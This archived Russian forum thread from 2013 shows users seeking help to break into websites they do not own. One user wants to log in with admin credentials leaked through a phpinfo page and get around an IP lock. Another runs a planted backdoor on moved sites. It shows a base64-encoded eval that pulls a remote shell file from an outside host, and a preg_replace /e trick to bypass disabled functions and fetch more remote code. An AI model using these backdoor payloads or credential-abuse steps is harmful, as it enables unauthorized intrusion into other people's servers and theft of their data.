ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

04.04.2013, 10:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 15180
Репутация:
0
|
|
Нарыл на сайте спрятанный пхпинфо, а в нем пасс и логин админа, только админ залогинен круглосуточно, а сайт не позволяет залогиниться с разных ип одному юзеру. Как это можно обойти?
|
|
|
|

04.04.2013, 11:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме: 1585404
Репутация:
564
|
|
в phpinfo логин и пасс ? 0_о
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|

04.04.2013, 12:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 15180
Репутация:
0
|
|
Сообщение от shell_c0de
shell_c0de said:
в phpinfo логин и пасс ? 0_о
Как в том анекдоте про говорящую корову: "Че смотришь? Я сама охуела".
НО, как я уже сказал, залогиниться под ним не могу. Там-же, кстати еще и куки прописаны, но подставлять пока не пробовал, к тому-же не понятно, админские они или нет, и не залочит-ли их сервер с другого ип, как лочит авторизацию...
Помогите советом
|
|
|
|

04.04.2013, 22:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 15180
Репутация:
0
|
|
Подскажите, это:
passhash=md5(concat(salt,concat(" . sqlesc($password) . ",salt)))
означает
md5(md5(salt.pass.salt))
или
md5(md5(salt.md5(pass).salt))
Или нет?
|
|
|
|

04.04.2013, 22:33
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от zloy_fantom
zloy_fantom said:
Подскажите, это:
passhash=md5(concat(salt,concat(" . sqlesc($password) . ",salt)))
означает
md5(md5(salt.pass.salt))
или
md5(md5(salt.md5(pass).salt))
Или нет?
md5(salt.password.salt)
|
|
|

04.04.2013, 22:34
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от zloy_fantom
zloy_fantom said:
Нарыл на сайте спрятанный пхпинфо, а в нем пасс и логин админа, только админ залогинен круглосуточно, а сайт не позволяет залогиниться с разных ип одному юзеру. Как это можно обойти?
Чё за бред ? Быть такого не может...
|
|
|

04.04.2013, 23:54
|
|
Новичок
Регистрация: 10.01.2009
Сообщений: 0
Провел на форуме: 9138
Репутация:
0
|
|
короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50 cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]eval,[/COLOR][COLOR="#0000BB"]exec[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]passthru[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]scandir[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]popen[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]shell_exec[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]proc_open[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]proc_close[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]proc_nice[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]get_current_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]getmyuid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]posix_getpwuid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_get_modules[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]virtual[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]posix_getgrgid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]getmyinode[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]fileowner[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]filegroup[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]getmypid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_get_version[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_getenv[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_note[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_setenv[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]disk_free_space[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]diskfreespace[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]dl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ini_restore[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]openlog[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]syslog[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]highlight_file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]show_source[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]symlink[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]disk_total_space[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ini_get_all[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]get_current_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]posix_uname[/COLOR][/COLOR]
тоесть eval отключён( как теперь можно попасть в шел)
|
|
|

05.04.2013, 00:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 15180
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Чё за бред ? Быть такого не может...
Поверьте, там есть данные:

|
|
|
|

05.04.2013, 00:20
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от sova1611
sova1611 said:
короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50 cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]eval,[/COLOR][COLOR="#0000BB"]exec[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]passthru[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]scandir[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]popen[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]shell_exec[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]proc_open[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]proc_close[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]proc_nice[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]get_current_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]getmyuid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]posix_getpwuid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_get_modules[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]virtual[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]posix_getgrgid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]getmyinode[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]fileowner[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]filegroup[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]getmypid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_get_version[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_getenv[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_note[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]apache_setenv[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]disk_free_space[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]diskfreespace[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]dl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ini_restore[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]openlog[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]syslog[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]highlight_file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]show_source[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]symlink[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]disk_total_space[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ini_get_all[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]get_current_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]posix_uname[/COLOR][/COLOR]
тоесть eval отключён( как теперь можно попасть в шел)
Попробуй так:
?e=preg_replace("/.*/e","phpinfo();",".");
P.S: Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!
|
|
|

05.04.2013, 00:57
|
|
Новичок
Регистрация: 10.01.2009
Сообщений: 0
Провел на форуме: 9138
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
Попробуй так:
?e=preg_replace("/.*/e","phpinfo();",".");
P.S:
Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!
выдало Hacking attempt! а на другом бэкдоре выдало phpinfo
а вот ?e=preg_replace("/.*/e","file_get_contents('http://site.ru/2.txt');",".");
не обработало ни на одном(
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|